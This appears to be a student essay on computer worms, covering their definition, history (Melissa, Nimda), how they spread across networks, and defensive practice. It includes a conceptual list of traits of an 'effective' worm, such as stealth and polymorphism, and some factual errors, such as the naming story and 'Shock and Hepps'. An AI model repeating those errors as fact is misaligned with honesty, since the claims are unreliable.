Worm Viruses

            The increasing popularity of worm viruses is making computing a dangerous venture for the unknowledgeable about computer security.  Computer security is vastly becoming a necessity to learn in today’s computing era.  With the invention of the worm every computer that is linked to another is vulnerable without the appropriate measures in place or at least the appropriate education.  In order to understand the security problems we first have to look at what is a worm virus, how does a worm virus operate, who develops these viruses, what are some of the well known worm viruses out there and the vulnerabilities they pose and finally what can a user do to prevent, detect, and exterminate these vulnerabilities from their system.

            A worm is a type of computer virus defined as malicious software intended to do damage.  These are malicious code segments that replicate and send themselves to other systems to also infect them.  It is a program that moves through a system altering the language or bit of data.  The worm received its name because of the tracks of zeros it leaves while it is moving through the system.  These tracks tend to resemble the tracks a worm leaves in the sand when it moves from one place to another.  A worm however will not infect multiple applications.  When it enters a system it has one specific mission to carry out.  Once that mission has been carried out then it conducts its secondary mission and that is to execute the code to forward itself on to another victim either through e-mail or through a network of some sort.  One key asset to being defined as a worm is the ability to spread through a network from one system to another without human intervention.

            Worms unlike viruses do not infect programs they simply infect other computers.  The worm’s major motivation is to congest and shut down a network.  These worms take advantage of features in network connections.  Worms exploit automated functions within a network.  Worms tend to try to execute and spread as fast and far as possible to hopefully do its business before it is detected that way the damage is already done.

The Host worm and the network worm are two types of worms.  These worms differ in where their code or executable program is located.  Host worms are based in an infected computer and uses a network connection to transfer.  A network worm does not rely on a host machine it uses network connections to spread and run its various code.  

            Unlike human viruses, computer viruses are not airborne diseases.  Computer viruses like the worm have to have some sort of a direct link to other computers.  These viruses can be transmitted by e-mail, modem, Local Area Network (LAN), the Internet, or simply by taking a floppy disk from a computer that is infected to another computer that is not infected.  In simplistic terms there needs to be some sort of direct link to the system in order for infection to take place.  If a user was to never connect their computer to any other computer by any means and did not transmit data back and forth using any floppy devices then it is safe to say that computer’s only way of contacting a virus would be through the use of a Trojan horse in the software purchased at a retailer for the purposes of installation on a stand alone computer.  A worm virus would not exist on the computer.  If for instance a worm was packaged as Trojan horse it would be able to do its business on the stand-alone computer but it would not be able to fulfill its entire mission as a worm and that is to send itself on to do damage to other computers because no connection to other computers would exist.  A simile would be pregnancy.  The only sure fire way to avoid getting pregnant is to practice celibacy.  The same holds true in the computer industry.  However, maintaining celibacy carries with it a cost as well.  In today’s technology driven society connectivity to the Internet is becoming a must to survive.  While this theory of celibacy may hold true for the home user with not interest in the outside world the same would not work for industry.  To survive in today’s market a business needs to stay with the times and that direction is with computing. 

The existence of worm programs goes back a few years.  In the early 1980s Shock and Hepps did some early experiments with worm programs on idle hosts on an early Ethernet LAN.  This worm would occasionally get out of hand and have to be exterminated.  This was determined to be a difficult task because the worm program had an ability to jump back and forth from host to host.  Another early worm is the Christma.exec, which surfaced in December 1987.  This worm was one of the first that was introduced as an e-mail version worm.  It required the user to actually execute the e-mail.  This worm was written in REXX.  As a result IBM had to write one of the first mail scanner programs in order to eradicate the worm.  One of the most renowned worms out there today is the Melissa.  This worm surfaced in March 1999.  It had two methods of spreading itself.  It would spread either by being opened in word as a macro virus or as an Outlook-enabled worm.  The Outlook-enabled worm is what made Melissa famous and gained the media attention it got.  The worm component of Melissa was how it interacted with the Outlook Address Book and sent itself to the first 50 people in the personal address book.  This was a one-time payload.  Melissa gained its popularity because it was the most widespread virus of its time in March 1999.  It is often said that Melissa infected approximately one million computers and caused between ninety three million dollars and three hundred eighty five million dollars in damages.  This damage assessment was with Melissa only being widespread for about a week. 

There are several ways a worm can make its way through a LAN.  One way is through unprotected shares.  Unprotected shares are files that are shared out that do not require a password or some other form of authentication in order to gain access to these files.  These are probably the most vulnerable files on a computer.  They require very little effort on the part of the worm in order to gain access.  Another way a worm can make its way through a network is into protected network shares.  These are files that are shared out but also require some form of authentication in order to gain access to these files.  An example would be a password.  Some worms are intelligent enough that they have executables within them that use password guessing techniques to try and break the password code and gain access.  Once the worm is inside it can infect the files.  With the user knowing these files are password-protected detection may not happen because the user isn’t expecting this area to be infiltrated.  Already connected share drives is another highway the worm uses to pass itself through the network.  These drives are drives within the network that are automatically connected when the system boots up.  These connections are written into the boot up directory.  As a result these drives remain active the entire time the computer is logged on.  The worm then makes its way to other computers through this connection as each computer logs on.  A last and most common way of migrating the worm from computer to computer within a network is corporate e-mail.  This method is the most widely used method and it is a method that allows the worm to infect multiple users at the same time and spread itself to more computers within a small amount of time.

Another popular worm that gained a vast amount of media attention in September 2001 is the Nimda worm.  This worm utilized multiple methods to spread itself to other computers.  This worm used e-mail, it searched for open network shares, it attempted to copy to unpatched or already vulnerable Microsoft web servers, and it contained a virus that infected local files and remote network files.  Nimda used Unicode Web Traversal exploit. As Nimda arrives by e-mail it uses MIME exploit to allow the virus to execute.  This is done just by reading or previewing the file.  If you visit a compromised Web Server you could be prompted to download an .eml file, which is an Outlook Express file.  This file contains the Nimda worm as an attachment.  To avoid this you can disable the “File Download” by going to the security zones in Internet Explorer and disabling the feature.  This should prevent a compromise.  The Nimda worm will also create holes in your system once it is on the system.  These holes are in the form of system shares.  Nimda creates open system shares on your computer allowing access to your system.  It also creates the guest account on your computer as having administrator privileges.  This could lead to a serious security issue because it enables anyone logging in to your computer to have full access to anything contained on that system.  Using the Nimda worm as a delivery source an attacker is able to compromise a vulnerable IIS server remotely.  The attacker is then able to create an account on the targeted server with administrator privileges regardless the drive installed on.  The worm then uses directory transversal techniques to access cmd.exe on unpatched IIS servers.  The worm also attempts to use IIS servers that have previously been infected by the Code Red II to access the root.exe from the inetpub/scripts directory.  This worm then searches for Web servers using a randomly generated IP address.  Using Unicode Web Transversal exploit, Nimda copies itself to the Web server as an admin.dll file via TFTP.  Infected machines then create a listening TFTP server (port 69/UDP) to transfer the worm.  This file is then copied to multiple locations.  It then attempts to modify files named default, index, main or read me, or files with extensions (i.e. .htm, .html, or .asp) by adding JavaScript.  This JavaScript is written to allow visitors to view.  However, once the user views the page that is infected then they are presented with a read me.eml, which was created by Nimda.  This file is an Outlook Express e-mail file with the worm as an attachment.  The message utilizes the MIME exploit.  As a result one can see simply browsing the Internet can infect a computer.

In order to have an effective worm it should contain seven simple principles:  portability, invisibility, independence, learning, integrity, polymorphism, and usability.  In order to meet the portability aspect the worm must have the capability to operate and conduct its business on multiple operating system platforms.  Invisibility exists when the worm is able to operate in a stealth or masquerading mode.  It must have the ability to hide and avoid detection.  To have independence the worm must be able to spread automatically without requiring user responses.  To meet the learning principle the worm should be able to learn new exploits and techniques instantly.  They should be able to update their code-using worm net.  Integrity talks about the ability to be traced.  Worms should be single and their structure should be difficult to trace, modify, or intrude and kill.  Polymorphism relates to the fact the worm should be fully polymorphic, with no constant portion of specific code, to avoid detection.  For a worm to have good usability it should be able to complete its mission, infect its destination, download instructions and once completed it should disappear from all systems.

People who write malicious logic as a hobby develop worms.  Some are looking for financial gain, infiltrating systems to gain information, or simply the hackers that is looking for fame or bragging rights.   Since these people seek to do their business for one of these reasons it usually results in some sort of media attention.  With the ignorance of what worms are and what they do people don’t know how to detect and react resulting in the worm successfully completing its mission.

Now that we know what a worm is, what it can do, what type of worms are out there the bigger question comes to mind.  What can we as users or administrators do to protect our systems against the worm?  Well the only sure fire way of 100% protection is to not have any connection to any computer in any way shape or form. That is not always a productive solution because the whole purpose of information is to share it with those with a valid need to know.  In today’s technology the best and most efficient way to do that is through computers and networks.  The next best solution is to devise a plan that includes awareness, protection, detection, a reaction plan and a plan to recover from the situation in the event there is a need.  One such way to protect a system or network is to stay tuned to what threats exist and what vulnerabilities exist.  Find out if there is a fix to that vulnerability and if so implement the fix before you are hit.  Knowing your systems, what threats exist, what vulnerabilities you have and what fixes are out there is the best protection plan.  Detection has to be a responsibility shared by all who use the information.  Checking the system and reporting any abnormalities to other users can help prevent the worm from spreading.  The users should know what the information should contain and when there is an abnormal change in the information then it should be promptly reported to the system administrator to implement and inspection and if necessary to implement the reaction phase.  The reaction phase would consist of isolating the threat and extracting the threat from the system before further damage can be instituted.  The most important element of any reaction phase is notification.  By notification I mean it is important to let all users, that utilize the same connections or share the same information, know what threat exists so that the may react, prevent and detect their systems as well.

The key element of any Information Security plan is education.  If your users are not educated then you loose your grip of the program.  This theory may sound harsh but it is the true cold hard facts.  The users are the front line of defense.  Similar to the Marine Corp in a time of war, they are on the front line when the enemy is charging and are the front line of defense.  The user on a network system is the front line of defense for an information security program.  In the unfortunate event a worm is released on the Internet or a network the user is going to be the first person to notice that infiltration.  That notification will come in the form of corrupt data, slower than normal system, lost data, or worst-case scenario a system completely crashes.  They will be the ones who report the situation in a timely fashion to hopefully minimize the damage.  Worms travel from system to system and the only way to stop them is to first stop their mode of travel from system to system.  Next they must be contained.  Thirdly they must be removed and exterminated.  Then and only then will you have rid yourself of the worm.  The worm's nature is to survive by infecting and moving on without being detected until it is too late.  There is some software out there that its sole purpose is to manage this for you.  However it only protects against things it is programmed to recognize.  New worms are developed each day so to rely on this software as your sole source of detection would not be a very wise Information Security Program.  The best program against fighting the worm would be a program that encompasses all of these elements into one program.  

Reference Page

 

Burger, Raif.  “Computer Viruses a high-tech disease”, Grand Papids, Michigan, Abacus,

 

1988

Fites, Philip, Peter Johnston, and Martin Kratz.  “The Computer Virus Crisis”, New ork,

 

New York, Van Nostrand Reinhold, 1992

 

Forcht, Karen A.  “Computer Security Management”, Danvers, Massachusetts, Boyd &

 

Fraser Publishing Company, 1994

 

“I-Worm.Nimda”, http://www.kaspersky.ch/avpve/worms/nimda.stm

 

Schellenberg, Kathryn (Editor).  “Computers in Society-Sixth Edition”, Guilford,

 

Connecticut, Dushkin Publishing group/Brown & Benchmark Publishers, 1996

 

Schwartau, Winn.  “Chaos on the Electronic Superhighway-Inforamtion Warfare”, New

 

York, New York, Thunder’s Mouth Press, 1994

 

Stallings, William.  “Internet Security Handbook”, Foster City, California, Mecklermedia

 

Corporation, 1995

 

“Tips on Avoiding Worms”, http://www.f-secure.com/virus-info/tips.shtml

Whalley, Ian, Bill Arnold, Dave Chess, John Morar and Alla Segal, “An Environment for

Controlled Worm Replication & Analysis (Internet-inna-Box)”, presented at the

Virus Bulletin Conference, September 2000

http://www.research.ibm.com/antivirus/SciPapers.htm